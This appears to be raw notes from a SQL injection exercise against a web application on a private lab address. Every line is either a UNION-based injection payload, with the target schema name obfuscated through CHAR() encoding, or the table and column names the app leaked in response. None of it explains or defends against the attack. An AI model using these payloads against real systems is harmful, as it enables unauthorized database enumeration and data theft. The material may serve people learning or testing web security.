// ID: -1 union select column_name,0 from information_schema.columns where table_schema=CONCAT(CHAR(77), CHAR(101), CHAR(109), CHAR(98), CHAR(101), CHAR(114), CHAR(95), CHAR(115), CHAR(117), CHAR(114), CHAR(118), CHAR(101), CHAR(121)) 
// First name: id_vote
// Surname : 0
// ID: -1 union select column_name,0 from information_schema.columns where table_schema=CONCAT(CHAR(77), CHAR(101), CHAR(109), CHAR(98), CHAR(101), CHAR(114), CHAR(95), CHAR(115), CHAR(117), CHAR(114), CHAR(118), CHAR(101), CHAR(121)) 
// First name: vote
// Surname : 0
// ID: -1 union select column_name,0 from information_schema.columns where table_schema=CONCAT(CHAR(77), CHAR(101), CHAR(109), CHAR(98), CHAR(101), CHAR(114), CHAR(95), CHAR(115), CHAR(117), CHAR(114), CHAR(118), CHAR(101), CHAR(121)) 
// First name: nb_vote
// Surname : 0
// ID: -1 union select column_name,0 from information_schema.columns where table_schema=CONCAT(CHAR(77), CHAR(101), CHAR(109), CHAR(98), CHAR(101), CHAR(114), CHAR(95), CHAR(115), CHAR(117), CHAR(114), CHAR(118), CHAR(101), CHAR(121)) 
// First name: subject
// Surname : 0


http://192.168.1.34/index.php
?page=member
&id=-1 UNION ALL SELECT NULL,concat(TABLE_NAME) FROM information_schema.TABLES WHERE table_schema=CONCAT(CHAR(77), CHAR(101), CHAR(109), CHAR(98), CHAR(101), CHAR(114), CHAR(95), CHAR(115), CHAR(117), CHAR(114), CHAR(118), CHAR(101), CHAR(121))&Submit=Submit

Surname : vote_dbs

-------------------------------------


